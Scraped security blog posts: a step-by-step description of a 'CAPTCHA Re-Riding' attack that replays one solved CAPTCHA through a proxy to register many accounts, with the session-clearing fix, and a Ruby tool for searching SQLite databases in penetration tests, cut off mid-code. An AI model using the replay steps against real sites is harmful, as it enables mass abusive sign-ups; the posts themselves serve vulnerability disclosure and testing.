<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSp7QoacFmBgcuMC8tIDcNSCtFW3JwZXgwbZ6slg7wTtUoMERLoPgY5Wbv05p-TnUrxl7KQTrKGnG0estv8S8DhIpS8muFOM3C4bl6NPE55tULBgV77R4lNKL6U166w3WC11Oxhe8ByoZ/s1600/all-types-of-requests.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSp7QoacFmBgcuMC8tIDcNSCtFW3JwZXgwbZ6slg7wTtUoMERLoPgY5Wbv05p-TnUrxl7KQTrKGnG0estv8S8DhIpS8muFOM3C4bl6NPE55tULBgV77R4lNKL6U166w3WC11Oxhe8ByoZ/s400/all-types-of-requests.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: left;">Image shows various Create, Read, Delete and Update operations of the “Categories” Feed along with the supported Service Operation nodes</span>
</td></tr>
</tbody></table>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="WhitePaperBodycopy">
</div>
<div class="WhitePaperBodycopy">
The tool is now available for download from McAfee website from <a href="http://www.mcafee.com/us/downloads/free-tools/oyedata.aspx" target="_blank">this</a> URL. Please send in your suggestions and feedback.</div>
</div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com8tag:blogger.com,1999:blog-4663432300421783651.post-48250629933782584232012-03-02T23:06:00.002-08:002014-05-15T16:52:12.167-07:00CAPTCHA Re-Riding Attack<div dir="ltr" style="text-align: left;" trbidi="on">
This attack was voted at #8 in <a href="https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/">Top Ten Web Hacking Techniques of 2012</a><br />
<br />
<div class="MsoNormal">
CAPTCHA Re-Riding Attack bypasses the CAPTCHA protection built into the web applications. The attack exploits the fact that the code that verifies CAPTCHA solutions sent by the user during form submissions does not clear the CAPTCHA solution from the HTTP Session. </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Impact:</b> <span style="font-family: Calibri, sans-serif; line-height: 115%;">A large number of successful submissions on CAPTCHA protected pages by riding on a single CAPTCHA solution.</span> </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: 'Trebuchet MS', sans-serif;">A typical scenario to demonstrate the vulnerability is explained below. </span></div>
<div class="MsoNormal">
</div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">1.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">A user visits register page of the website.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">2.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">The website creates an HTTP session, assigns it a SESSIONID and returns the register page to the user along with the SESSIONID cookie. The register page also contains one image tag which directs the browser to retrieve a CAPTCHA and display it on screen.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">3.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Upon parsing the image tag, the browser sends out request for the CAPTCHA. <o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">4.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">The server side code creates a new CAPTCHA with random text and CAPTCHA solution is stored in the HTTP session.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">5.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">CAPTCHA image is then sent to the client and is then displayed by the browser. <o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">6.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Browser sends CAPTCHA solution along with form fields for verification.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">7.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Server side code retrieves CAPTCHA solution from the HTTP Session and verifies it against the solution provided by the client.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">8.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">If verification is successful, client is sent to next logical step in the registration process. If not, client is redirected to the register page (step 1 above).</span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 15px; line-height: 22px;"><br />
</span></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;"><br />
</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulF9UOCtMWOeQi8hAUIe2oParYlWrfrpeTUnhbX10bmd5Nn2uQOp6WHlz16vJYkm8oAYm2HPu7p58NChVEccmaGpxjg1tR0MaDi1g5Z5zZI_xM6Nq02A5kgMiSf_lzOSGNC7EJ5QXdCp-/s1600/sample-captcha-implementation.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulF9UOCtMWOeQi8hAUIe2oParYlWrfrpeTUnhbX10bmd5Nn2uQOp6WHlz16vJYkm8oAYm2HPu7p58NChVEccmaGpxjg1tR0MaDi1g5Z5zZI_xM6Nq02A5kgMiSf_lzOSGNC7EJ5QXdCp-/s400/sample-captcha-implementation.png" height="248" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption">
<span style="font-size: x-small;"><span style="font-family: Verdana, sans-serif;">Figure 1</span><span style="font-family: Verdana, sans-serif;">: Image shows an example Register page that supports CAPTCHA</span></span><span style="font-size: 11pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<br />
Analysis of the CAPTCHA generation and verification process reveals the following:<br />
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo1; text-indent: -.25in;">
</div>
<ol style="text-align: left;">
<li><span style="text-indent: -0.25in;">The captcha.php is the only page responsible for updating the HTTP session with correct CAPCHA solution. </span><span style="color: red; text-indent: -0.25in;">The first ingredient.</span></li>
<li>CAPTCHA solution inside the HTTP session is not explicitly cleared during the verification process. Yes, you guess it right. <span style="color: red;">This is</span> <span style="color: red;">the second and the most important ingredient for</span> <span style="color: red;">CAPTCHA Re-Riding Attacks.</span></li>
<li>When registration fails (for any reason), the web applications continue to use the same HTTP session and SESSIONID. We will not look into this further.</li>
<li>When registration succeeds, the user is redirected to next step and the CAPTCHA generation page (/captcha.php) is not likely to be called for current SESSION again. This allows the CAPTCHA solution to stay in the HTTP store for as long as SESSION is valid. Following are the likely scenarios to be seen when CAPTCHA verification is successful.</li>
<ol>
<li>The web application generates a new SESSIONID for the same HTTP session for known security reasons. This implementation is most likely to be seen. <span style="color: red;">Combine this behavior with first and second ingredients above and you have a successful CAPTCHA Re-Riding attack.</span></li>
<li>The web application continues to use the same SESSIONID for the same HTTP session. Here we have more things to worry than just the CAPTCHA. <span style="color: red;">For now, combine this behavior with first and second ingredients above and you have a successful CAPTCHA Re-Riding attack again.</span></li>
<li>The web application generates a completely new HTTP session with new or same SESSIONID. For CAPTCHA Re-riding Attack, this scenario is not exploitable.</li>
</ol>
</ol>
<br />
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
For scenarios 4.a and 4.b, the HTTP Session continues to hold the CAPTCHA solution as it is not explicitly cleared by the CAPTCHA verification code. Since /captcha.php is not going to be called again (and we will not let the call happen anyway), the same CAPTCHA solution continues to exist in HTTP session. Let us now see how <b>4.a</b> & <b>4.b</b> scenarios above can be exploited to make multiple successful submissions using a CAPTCHA solution.<o:p></o:p></div>
<br />
<br />
<div class="MsoNormal">
<b>Exploiting Scenario 4.b:<o:p></o:p></b></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">1.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Load the register page of the target website in a web browser.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">2.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Solve the CAPTCHA manually, and submit the form.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">3.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Record this form submission using a web proxy. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">4.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Create a custom script or use any tool like Burp intruder that can repeatedly send this request to server. With each request change the unique values (like User ID) to create multiple new accounts with a single CAPTCHA solution.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<div class="MsoNormal">
<b>Exploiting Scenario 4.a:<o:p></o:p></b></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">1.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Load the register page of the target website in a web browser.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">2.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Solve the CAPTCHA manually, and submit the form.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">3.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">To make things easy, trap this request in a web proxy and do not allow it to reach the web server. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">4.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Create a custom script or use any tool like Burp intruder that can repeatedly send this request to server. <o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">5.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Submit one request.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">6.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Upon successful submission, the web application will reset the current SESSIONID and send new SESSIONID back in response headers. <o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">7.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Change the value of SESSIONID in recorded request (step 3) to the value copied from response in Step 6 above.<o:p></o:p></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">8.<span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Go to step 5.</span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 22px; text-indent: -0.25in;">9. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%; text-indent: -0.25in;">We will be able to make multiple successful submissions with single CAPTCHA solution.</span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 15px; line-height: 17px;"><br />
</span></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
</div>
<div class="WhitePaperBodycopy">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Using one time tokens along with CAPTCHAs on the register pages may still be exploitable with a few additional lines of attack code. The best defense is to reset CAPTCHA solution inside the HTTP session during the CAPTCHA verification stage. It is also important to note that when a website relies on third party CAPTCHA provider it does not maintain any session information at its end and CAPTCHA is performed by the CAPTCHA provider and these websites are not vulnerable to CAPTCHA Re-Riding Attack.</span></div>
<div class="MsoNormal">
<o:p></o:p></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com4tag:blogger.com,1999:blog-4663432300421783651.post-36550764311787013882012-02-25T02:08:00.000-08:002012-02-25T02:08:48.684-08:00Sqlitespy for Sqlite Database analysis<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlite is the ubiquitous database for mobile applications on iPad, iPhone and Android. It is also used by certain internet browsers, web application frameworks and software products for their local storage needs. While doing penetration tests, we often see sensitive information like usernames, passwords, account numbers, SSN etc… insecurely stored in these databases. Thus, every penetration test requires comprehensive analysis of the local databases being used.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<div><span style="font-family: 'Trebuchet MS', sans-serif;">While analyzing databases, a penetration tester repeatedly does the following:</span></div><ol style="text-align: left;"><li><span style="font-family: 'Trebuchet MS', sans-serif;">Opens the database in sqlite reader (sqlite3 or other readers)</span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;">Views various tables and columns to understand database layout and schema.</span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;">Analyzes the storage for sensitive information.</span></li>
</ol><span style="font-family: 'Trebuchet MS', sans-serif;">As the number and size of database increases, the analysis time increases exponentially. To escape the recurring pain, I wrote a ruby script to automate this process. The script achieves the following:</span><br />
<ol style="text-align: left;"><li><span style="text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Analyzes multiple databases in a single run.</span></span></li>
<li><span style="text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Queries and displays database schema.</span></span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;"><span style="text-indent: -0.25in;">Provides an option to run search on Table and Column Names for quick </span><span style="text-indent: -0.25in;">analysis.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Performs case-insensitive regular expression search (default). This can be controlled with command line options to one’s requirements.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Displays Database, Tables and Row Number reference for every successful match.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Dumps database rows on a successful match.</span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Looks for search strings in the following:</span></span></span></li>
<ul><li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Table Name</span></span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Column Names</span></span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Actual Data</span></span></span></li>
</ul></ol><div class="MsoNormal"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlitespy dependencies are listed below:</span></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><a href="http://www.ruby-lang.org/en/"><span style="font-family: 'Trebuchet MS', sans-serif;">Ruby</span></a></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;"><a href="http://rubygems.org/gems/sequel">Sequel </a>Gem</span></li>
<li><a href="http://sqlite.org/download.html"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlite3</span></a></li>
</ol><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<div class="MsoNormal"><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span></div><div class="MsoNormal"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEYujccaKf7j-KHH3oznIsHRsQPfB8wsfZNBe_qyFpz611rDrTUJL26vbNwut3W0vviY4naOk83Tp8ybmGCBGfO_V5UKPQ26T5Bta_uQq8Bd8tx4aIJln08TgkVweTThKZZFiu1lVS1G__/s1600/spy--help.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEYujccaKf7j-KHH3oznIsHRsQPfB8wsfZNBe_qyFpz611rDrTUJL26vbNwut3W0vviY4naOk83Tp8ybmGCBGfO_V5UKPQ26T5Bta_uQq8Bd8tx4aIJln08TgkVweTThKZZFiu1lVS1G__/s400/spy--help.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 1: Image shows sqlitespy help</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGxJ2jPYncp9oBNWYiQhlDxv-6oU_uziQInR67x2MyIwYw9m75682GwzqMKsCdDBXSOTVaygsZXwneoBNq-FYcXZJuQdFQ5WB0qkgeR4epmNXHgbJ4WlaBjJrEsk86L5_MzEeyrUXOHPD-/s1600/spy--sample--run-row--dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGxJ2jPYncp9oBNWYiQhlDxv-6oU_uziQInR67x2MyIwYw9m75682GwzqMKsCdDBXSOTVaygsZXwneoBNq-FYcXZJuQdFQ5WB0qkgeR4epmNXHgbJ4WlaBjJrEsk86L5_MzEeyrUXOHPD-/s400/spy--sample--run-row--dump.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 2: Image shows sqlite sample run with multiple search strings and row information dump for a successful match</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSqOliCk5y0dO88y9GbCh6Ck0qC4IIy5Y-_XzJ0gU-b4foOVGq0YQPGZ1w2y9RkBqV0LVTCC1XYuUPBRkaxnIzsBlpyyog0No_bXcrbfRhgb-sNqbIpORIxzgrhemUp10ejSYeh8VFlfS0/s1600/spy--sample--run.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSqOliCk5y0dO88y9GbCh6Ck0qC4IIy5Y-_XzJ0gU-b4foOVGq0YQPGZ1w2y9RkBqV0LVTCC1XYuUPBRkaxnIzsBlpyyog0No_bXcrbfRhgb-sNqbIpORIxzgrhemUp10ejSYeh8VFlfS0/s400/spy--sample--run.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 3: Image shows sqlitespy sample run with minimal information</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaa1oXLc9h8R3gDwSe1ZFjOkFIOrVVBPhlioDRSA8TNa-19yBcZcUQebsBJv0o6Yf6q4FXOAKoGV1HT3b4UfEvIim1M-KlzV_MYg06BUqPZZvZLHheox5Ck0Ni0ROMuQmP5UJ4p55TLSA-/s1600/spy--schema--dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaa1oXLc9h8R3gDwSe1ZFjOkFIOrVVBPhlioDRSA8TNa-19yBcZcUQebsBJv0o6Yf6q4FXOAKoGV1HT3b4UfEvIim1M-KlzV_MYg06BUqPZZvZLHheox5Ck0Ni0ROMuQmP5UJ4p55TLSA-/s400/spy--schema--dump.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 4: Image shows sqlite database schema dump</span></div></td></tr>
</tbody></table><br />
<b><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlitespy Code Follows:</span></b><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style><br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #Author: Gursev Singh Kalra
require 'rubygems'
require 'optparse'
require 'ostruct'
require 'sequel'
class CmdLineOptions
def self.parse(args)
options = OpenStruct.new
options.dbs = []
options.sstrings = []
options.show_schema = false
options.case_sensitive = false
options.exact = false
options.verbose = false
options.rowdump = false
options.metadata = false
opts = OptionParser.new do |opts|
opts.banner = "Usage: sqlitespy.rb [options]\n\nSpecific Options:"
opts.on("-d", "--database DATABASE_PATH",
"Sqlite database to analyze.") do |db|
options.dbs << db
end
opts.on("-s", "--show-schema", "Show database schema") do |show|
options.show_schema = show;
end
opts.on("--find x,y,z", Array, "Strings to search") do |list|
options.sstrings = list
end
opts.on("-c", "--case-sensitive", "Perform case sensitive search. Default is case insensitive.") do |case_sensitive|
options.case_sensitive = case_sensitive;
end
opts.on("-e", "--exact--match", "Perform exact match for the search strings") do |v|
options.exact = v;
end
opts.on("-r", "--row-dump", "Dump Database Row when a match is found") do |v|
options.rowdump = v;
end
opts.on("-m", "--metadata", "Look for search strings only in DB metadata (table and column names)") do |v|
options.metadata = v;
end
opts.on("-v", "--verbose", "Verbose output") do |v|
options.verbose = v;
end
opts.on_tail("-h", "--help", "Show this message") do
puts opts
exit
end
end
opts.parse!(args)
options
end# parse()
end# class CmdLineOptions
options = nil
begin
options = CmdLineOptions.parse(ARGV)
rescue (OptionParser::InvalidOption)
$stderr.puts "[-] Invalid option "
options = CmdLineOptions.parse(ARGV+["-h"])
end
if(options.dbs.length == 0)
$stderr.puts "[-] No Database available. Exiting !!"
exit
end
dbs = []
options.dbs.uniq!
dbs = options.dbs.collect do |db|
begin
throw Errno::ENOENT unless(File.file?(db))
Sequel.sqlite(db).tables
db
rescue
$stderr.puts "[-] \"#{db}\" is not a sqlite database"
